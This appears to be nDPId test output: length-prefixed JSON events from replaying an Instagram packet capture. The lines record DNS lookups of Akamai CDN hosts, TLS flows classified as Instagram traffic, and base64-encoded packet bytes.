00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="}
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"}
00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="}
00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="}
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="}
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"}
00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
